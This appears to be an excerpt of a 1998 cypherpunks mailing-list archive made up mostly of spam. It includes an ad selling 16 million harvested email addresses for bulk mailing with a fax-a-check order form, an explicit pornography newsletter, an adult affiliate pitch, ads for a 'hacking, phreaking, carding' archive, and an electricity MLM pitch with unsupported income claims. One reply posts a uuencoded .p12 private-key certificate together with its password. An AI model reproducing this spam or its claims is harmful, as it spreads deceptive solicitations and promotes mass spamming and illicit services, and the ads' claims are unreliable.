IF FOR ANY REASON YOU ARE NOT SATISFIED WITH OUR PRODUCTS, RETURN
THE UNUSED PORTION WITHIN 30 DAYS AND WE WILL GLADLY REFUND YOUR
MONEY.

For More Information visit our site at:	http://www.mda.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Friend@public.com
Date: Thu, 29 Jan 1998 00:47:58 -0800 (PST)
To: Friend@public.com
Subject: Just Released!  16 Million!
Message-ID: <50636853_56125305>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in  excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 150+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot  less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.   We received it just
prior to finishing production work on the new CD.   We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.   We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We did not clean  these, but we did create
3 seperate files named cyber1.txt, cyber2.txt, & cyber3.txt of 100,000
addresses each. This will give all people that use the list a opportunity to
send mail to the list before deciding if their CD is all it's hyped to be.

We also included a 2+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
 
AND
 
the a sampling of CyberPromo's HOT list.

>>> NOW ONLY $149.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere..PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 
 
 _____Yes! I would like to order MILLIONS Vol. 1 email addresses
for only $149.00.
 
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
JKP Enterprises
700 Boulevard 
Suite 102
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 29 Jan 1998 04:43:51 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Jan 29 '98
Message-ID: <19980129083708.8170.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

ULTIMATE HARDCORE
If you're  looking for  over 200  live  strip  shows and sex
crazed  video feeds  - 24 hours  a day!  -  thousands of XXX
photos - hundreds of Videos (Avis, Movs and Mpegs) - and all
totally free for a trial period,  then look no further.  The
only place you need to visit is Ultimate Hardcore. TRY FREE!
.. http://www.mr-cash.com/cgi-bin/ult-program.cgi/raw_3171/A

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Double D Amateurs
http://www.powerflow.com
Busty Voluptuous Amateurs, Real Houswives, Teens,
Girlfriends, and Older Women.   Over 200 Channels of
Unlimited Live/Video Stripshows and Hardcore Action. Join
now for Only $2.95

SOFT VELVET
Plenty of class  and  plenty of ass.  Soft Velvet  gives you
pretty thumbnails of pretty girls getting pretty damn turned
on. Be assured all the girls come from the best families and
are high class. (There's a certain something in their eyes).
Soft Velvet ..................... http://www.softvelvet.com/

FREE SLEAZE
Gee thanks! The  gift  of  free  sleaze  is  a  touching one
indeed. This is a cool site where you can get down dirty and
wallow in filth. If it's sleazy  then  you can find it here.
The smut leaps out at you as you look around. Sleazy to use.
Free Sleaze ..................... http://www.freesleeze.com/

HORNEY HONEYS
Hey! It's the happy  hardcore  home  to  hordes of hot horny
honeys. So, come across a lot of beautiful naked women here.
The site features the  shapeliest,  softest, prettiest, most
 wildly turned on  girls around.  They look  pretty in pink.
Horney Honeys ................. http://www.horneyhoneys.com/

LESBIAN DIARIES
Cool idea for a site. Our web mistress is sweet and innocent
and discovering lesbian  sex.  You'll  lap  up  her entries.
'Once I'd tasted the essence  of  her  sex,  I knew that our
friendship would never be quite the same again.' Nice girls!
Lesbian Diaries .... http://www.moback.com/tongue-in-groove/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Three dicks -------------------> http://207.168.184.26/trip/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
DANIELLE: She  titles  her  page  I'm  young,  kinky  and  I
swallow. Heck she sounds like  the  perfect woman. She loves
to get nasty and does full hardcore pictures. This chic is a
wild one, visit her now!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
WifeSluts.com:  An  incredible  selection  of  true,  reader
submitted sex stories  detailing  the  private sexcapades of
real slut wives. A wide selection of submitted wife slut XXX
pics too! ........................ http://www.wifesluts.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?290
Pic  2 --------------------------> http://137.39.63.229/?291
Pic  3 --------------------------> http://137.39.63.229/?292
Pic  4 --------------------------> http://137.39.63.229/?293
Pic  5 --------------------------> http://137.39.63.229/?294
Pic  6 --------------------------> http://137.39.63.229/?295
Pic  7 --------------------------> http://137.39.63.229/?296
Pic  8 --------------------------> http://137.39.63.229/?297
Pic  9 --------------------------> http://137.39.63.229/?298
Pic 10 --------------------------> http://137.39.63.229/?299

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Webmaster <webmaster@freshteens.com>
Date: Thu, 29 Jan 1998 10:32:17 -0800 (PST)
To: webmasters@nexus.freshteens.com
Subject: Earn $20 Per Signup
Message-ID: <v03110702b0f65c4980d6@[168.75.225.12]>
MIME-Version: 1.0
Content-Type: text/plain


Webmasters:

Are you tired of wondering if the hits you are sending to your sponsors are
being counted ??? Are you  really sure whether the hit you sent was a RAW,
a UNIQUE, or something else ??? Well MoJo Money eliminates those problems
all together. We will pay you a flat rate of $15 for every FREE weekly
membership you send and $20 for every other membership type !!!

That's right... $15-$20 for EVERY signup !!!

Check out our benefits to you:

- No Raw/Unique hassles...You are paid for every signup you
  generate.

- Your commission checks are prepared BI-WEEKLY by payroll
  processing firm ADP... No bullshit waiting for checks to be
  written by hand. And no minimum balance required. You will
  receive your check regardless of your commission.

- You are offering a FREE membership to a GREAT site... Your
  signups will go through the roof with this program !!!

- Real-Time on line stats! When a sale is approved you get
  INSTANT credit for it on your stats page. This is an
  actual stats page for one of our participating webmasters.


Goto http://www.freshteens.com/mojomoney and see why over 600 webmasters
have already joined the program !!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Freakazoid" <freakazoid@12574.com>
Date: Thu, 29 Jan 1998 10:45:21 -0800 (PST)
To: Friend@public.com
Subject: FUA - Great Underground
Message-ID: <199801291845.KAA24113@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Undergrounders!

This is a Transmition from Freakazoid. 
I just want to tell you that FUA - Freakazoid`s Underground Archive is now
comming up. Whith much, much moore undergound and eligal things than
you can ever imagen.

http://freakazoid.simplenet.com
/Freakazoid 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Freakazoid" <freakazoid@14749.com>
Date: Thu, 29 Jan 1998 11:18:22 -0800 (PST)
To: Friend@public.com
Subject: FUA - Has Open
Message-ID: <199801291859.KAA28446@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

Freakazoid`s Undergorund Archive Is About to Open. Please Stop by.
It`s cool.

Hacking
Phreaking
Carding
Undergorund
And much, much moore
http://freakazoid.simplenet.com

/Freakazoid




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: partners@partnersnow.com
Date: Mon, 2 Feb 1998 16:51:57 -0800 (PST)
To: partners@partnersnow.com
Subject: ELECTRICITY CAN MAKE YOU RICH
Message-ID: <199801300133.UAA02365@partnersnow.com>
MIME-Version: 1.0
Content-Type: text/plain


All of us are constantly bombarded by people hawking "unbelievable",
"once-in-a-lifetime", "get-rich-quick" business opportunities.  I graduated 
from Yale, became Commissioner of Housing in New York City, started a real 
estate development company, and now own an 83-year-old diamond-cutting
company.  Quite bluntly, I won't waste my time even listening to the pitch.

And yet right now, I am telling eveybody I know (and, obviously, hundreds
of people I don't know) about an opportunity available in the deregulation
of electricity that sounds just as outrageous as all the phony talk we've heard
in the past.  The difference is that this is real.  And the urgency comes from
the fact that it will never happen again.  You might choose to read no further,
but you will never be able to say that you weren't there when business 
history was being made.

MAKE NO INVESTMENT AND START PART-TIME

Know up front that your participation will not require start-up costs of more
than about $300 nor that you leave your current full-time job.  You should
also know that deregulated electricity in the US, albeit a $215-billion 
industry, is only one component in a global master plan that will soon tap
even larger markets in internet commerce, telecommunications, and 
energy distribution. In all these markets, our participation will be in
partnership with the most respected names in the corporate world. The 
structure of this precedent-setting Company has already been formed
and the names of our partners will be announced over the next few weeks.
We intend to do for all services entering homes, offices, and factories
what the supermarket did to individual food shops and what the mall did
to Main Street stores.  The powerful trend to consolidation will naturally 
successfully extend to essential modern services because the benefits
will be the same: lower cost and greater convenience.  This is nobody's
pipe dream.  This is history in the making, and you can become a very 
rich player by finally being in the right place at the right time and taking action.

DEREGULATION CAN ONLY HAPPEN ONCE

By the year 2002, the domestic electric utilities industry will be fundamentally
deregulated.  That means that the out-dated, costly, monopolistic utility 
providers, which we have always accepted like death and taxes, will be forced
to compete in the open market with lower-cost, high-tech, entrepreneurial,
service-oriented private companies.  In many states, the process has already
begun.  California's $20-billion industry will be one of the first to deregulate
completely in 1998, along with New Hampshire and Rhode Island.
Massachusetts and Pennsylvania are right behind, with many other states 
scheduling to start in 1998, too.  Consumers will have the right to choose 
the source of their power and you will have the opportunity to sell it.  And it
has all been done before.  In the 1970's, the airline industry deregulated
and the resulting competition destroyed established companies and made 
fortunes for others.  In the 1980's,  AT&T lost its monopoly and now barely
holds on to 50% of the market.  The significant difference in the deregulation of
electricity in the 1990's is that you are right now being given a chance to
participate even before it happens.

Our Company has developed the multi-million-dollar infrastructure to
support its goal of becoming to deregulated electricity what MCI became
to deregulated telephone.  And the distribution of our electricity will be
made only through independent entrepreneurs empowered by the Company
to profit every time a customer turns on a light.  Even more eye-opening, 
these "electricity entrepreneurs" will profit to an even greater extent from 
their monthly commissions on their customers' use of all the other services the
new Company will offer:  internet commerce, telephony of all kinds, home
security, cable TV, and many more.  With three or more services "bundled"
together, studies have shown that customers are lost at a rate of less
than 10% a year.  This is true residual income.

Compensation accrues from four main sources: (1) up-front agency fees paid to 
the Distributor when customers subscribe to our services; (2) up-front training
fees paid to the Sponsor when new Distributors join the Company; (3) residual
commissions paid to the Distributor as a percentage of customers' monthly
use of the Company's services; and (4) executive bonuses paid to Distributors
on the total volume generated by his or her entire organization.

CAPITALIZE ON A PROVEN ROCK-SOLID COMPANY

As I said, we are not looking for investors.  Our parent is a 13-year-old,
$1.4 billion, high-tech company with a D&B 5A-1, no debt, US Olympic
Committee licenses, and operations in 23 countries all over the world.  It is
one of nine companies in the history of the United States that grew from
start-up to one billion dollars in sales in less than ten years (others include
Microsoft, FEDEX, Nike, and Home Depot).  Our Asian division went public
on the New York Stock Exchange with Morgan Stanley and Merrill Lynch as 
our underwriters.  Most important, the Company has established a brilliant, 
highly-leveraged plan for growth that has empowered over 400 associates,
working on their own schedules, usually out of their own homes, to reach an
income level that in 1996 averaged $561,000 a year.  Significantly, that track
record was achieved in industries a small fraction of the size of deregulated 
electricity and our other future markets.

Please be aware that there will be many start-up companies hustling to be 
players in this historic opportunity.  There will be efforts by the utility dinosaurs
to hang on to their markets.  Be sure that your potential in this industry isn't
undermined by the failure of the insubstantial up-starts or the collapse of the
prehistoric giants.

LIFE IS NOT A DRESS REHEARSAL 

In my role as President of a diamond-cutting company,  I know the 
frustrations of a capital-intensive, high-risk, low-margin, slow-growth industry.
As an Administrator in the medical community, my wife sees the deterioration
in doctors' earnings and the downsizing and closing of hospitals everywhere.
While many of the old ways of making money are gone, new opportunities
abound.  Deregulated electricity is the next big opportunity, structured by a
genius hyper-growth Company that is already allowing my wife and me to
continue our professional work full-time, while enabling us to develop
part-time a perpetual income with unlimited potential.  The partners we are
seeking for this opportunity should be independent, open-minded, self-motivated, 
highly-principled entrepreneurs. Such a profile might seem demanding, but
the financial rewards can be gigantic.

I was skeptical, too, at first.  But the more I investigated, the more I realized
that this is the rare, legitimate, dynamic opportunity that people, not long from
now, will look back to and lament that they they missed.  Electricity 
deregulation has never happened before and will never happen again.
There is no doubt that fortunes will be made as a result of deregulation and
the Company's global vision.  The only question is who will be along for the 
ride.  And it might not be for you.  There are always reasons.  But clearly, 
if you continue to do what you've always done, you'll continue to get what
you've always gotten.  And if you've already gotten all the time freedom
and all the money you've always wanted, this opportunity is probably not for you.
But if you haven't, how long are you going to wait? 

For more information, please call 1-800-326-9253 or email me back and leave your name and daytime and evening phone number and the best time to call.  Serious inquiries only please.
///////////////////////////////////////////////////////////////////////////////
We practice responsible emailing.  If you wish to be removed from  future
mailings, please reply  with  remove in the subject.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 29 Jan 1998 19:28:22 -0800 (PST)
To: Fisher Mark <FisherM@exch1.indy.tce.com>
Subject: RE: Microsoft Internet Explorer: Request for Comments
In-Reply-To: <83C932393B88D111AED30000F84104A70A1ED3@indyexch_fddi.indy.tce.com>
Message-ID: <31m4Je7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Fisher Mark <FisherM@exch1.indy.tce.com> writes:

> >One small beef: why doesn't it accept .p12 certificates signed by
> >"Vesign web site CA"?
>
> Are these PEM or DER-encoded?  There is a known problem with PEM-encoded
> Certificate Authority certificates not being accepted at all.
> (DER-encoded Certificate Authority certificates are accepted, but MSIE
> 4.x won't display their contents while you are accepting them -- you
> have to accept them, then view their contents.)

Let me illustrate...

This is the cypherpunks.p12 certificate signed by "VeriSign Web Site Access CA"
for cypherpunks@bwalk.dm.com (Random Q. Hacker). I believe it's x509/DER.
You need to save it as a local file (say \temp\cypherpunks.p12).
The password ("pin") is "cypherpunks".

To import the certificate in your Netscape[tm] Navigator 4 browser I do this:

 Click on Communicator -> Security Info
 Under Certificates, click on Yours, then on "Import a Certificate"
 Select the local file. Type in the pin (cypherpunks) when prompted.
(see http://www.verisign.com/netscape/transport/import.html)

begin 644 cypherpunks.p12
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
